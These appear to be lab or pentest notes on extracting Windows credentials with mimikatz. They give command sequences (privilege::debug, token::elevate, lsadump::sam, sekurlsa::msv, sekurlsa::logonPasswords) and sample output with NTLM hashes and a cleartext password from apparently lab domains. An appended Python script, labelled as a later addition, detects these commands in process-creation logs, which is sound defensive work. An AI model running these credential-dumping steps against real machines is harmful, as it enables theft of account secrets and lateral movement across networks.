mimikatz
Extracting NTLM
hashes from local SAM
This method only retrieves hashes for local users on the machine. No domain users' hashes will be available.
mimikatz.exe
|->
mimikatz> privilege::debug
mimikatz> token::elevate
mimikatz> lsadump::sam
|->
RID : 000001f4 (500)
User : Administrator <- 🔥
Hash NTLM: 145e02c50333951f71d13c245d352b50 <- 🔥
hashes from LSASS memory
This method lets you extract NTLM hashes for local users and for any domain user who has recently logged on to the machine.
sekurlsa::msv
mimikatz.exe
|->
mimikatz> privilege::debug
mimikatz> token::elevate
mimikatz> sekurlsa::msv
|->
Authentication Id : 0 ; 308124 (00000000:0004b39c)
Session : RemoteInteractive from 2
User Name : bob.jenkins <- 🔥
Domain : ZA
Logon Server : THMDC
Logon Time : 2022/04/22 09:55:02
SID : S-1-5-21-3330634377-1326264276-632209373-4605
msv :
[00000003] Primary
* Username : bob.jenkins
* Domain : ZA
* NTLM : 6b4a57f67805a663c818106dc0648484 <- 🔥
sekurlsa::logonPasswords /full
./mimikatz.exe "privilege::debug" "token::elevate" "sekurlsa::logonPasswords /full" "exit" > mimikatz.dump3.txt
mimikatz.exe
|->
mimikatz> privilege::debug
mimikatz> token::elevate
mimikatz> sekurlsa::logonPasswords /full
|->
Authentication Id : 0 ; 313544 (00000000:0004c8c8)
Session : Service from 0
User Name : joe
Domain : MEDTECH
Logon Server : DC01
Logon Time : 5/3/2023 4:15:16 PM
SID : S-1-5-21-976142013-3766213998-138799841-1106
msv :
[00000003] Primary
* Username : joe <- 🔥
* Domain : MEDTECH
* NTLM : 08d7a47a6f9f66b97b1bae4178747494 <- 🔥
* SHA1 : a0c2285bfad20cc614e2d361d6246579843557cd
* DPAPI : 58de53296298ce0f98087ae902c88735
tspkg :
wdigest :
* Username : joe
* Domain : MEDTECH
* Password : (null)
kerberos :
* Username : joe
* Domain : MEDTECH.COM
* Password : Flowers1 <- 🔥
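Detection example (added here, not part of the original notes or of mimikatz): the one-line invocation above puts every module::command on the process command line, so process-creation logging records it. The sketch below matches the commands used on this page against constructed process-creation records; the field names, hosts and paths are assumptions.

```python
import re

# Commands taken from this page, lower-cased for case-insensitive matching.
PRIV_PREP = {"privilege::debug", "token::elevate"}
CRED_DUMP = {"lsadump::sam", "sekurlsa::msv", "sekurlsa::logonpasswords"}
MODULE_CMD = re.compile(r"\b([a-z]+::[a-z]+)\b", re.IGNORECASE)

def mimikatz_commands(command_line):
    """Return the page's mimikatz commands found in a command line, in order."""
    found = []
    for match in MODULE_CMD.finditer(command_line):
        cmd = match.group(1).lower()
        if cmd in PRIV_PREP | CRED_DUMP and cmd not in found:
            found.append(cmd)
    return found

def triage(events):
    """Return one alert dict per event whose command line carries a known command."""
    alerts = []
    for ev in events:
        cmds = mimikatz_commands(ev["command_line"])
        if not cmds:
            continue
        # A dump command means credentials were targeted; prep alone is a weaker signal.
        severity = "high" if CRED_DUMP & set(cmds) else "medium"
        alerts.append({"host": ev["host"], "image": ev["image"],
                       "commands": cmds, "severity": severity})
    return alerts

# Constructed process-creation records (hypothetical field names and hosts).
SAMPLE_EVENTS = [
    {"host": "WS01", "image": r"C:\Temp\mimikatz.exe",
     "command_line": './mimikatz.exe "privilege::debug" "token::elevate" '
                     '"sekurlsa::logonPasswords /full" "exit"'},
    # Renamed binary: the image name is useless, the arguments still match.
    {"host": "WS02", "image": r"C:\Users\Public\svc.exe",
     "command_line": 'svc.exe "privilege::debug" "lsadump::sam" "exit"'},
    # Interactive session: commands typed at the prompt never reach the command line.
    {"host": "WS03", "image": r"C:\Temp\m.exe", "command_line": "m.exe"},
    {"host": "WS04", "image": r"C:\Windows\System32\whoami.exe",
     "command_line": "whoami /priv"},
]

if __name__ == "__main__":
    for alert in triage(SAMPLE_EVENTS):
        print(alert)
```

The WS03 record shows the limit of command-line matching: commands typed at the mimikatz> prompt are not logged this way, so this check belongs alongside monitoring of process access to LSASS.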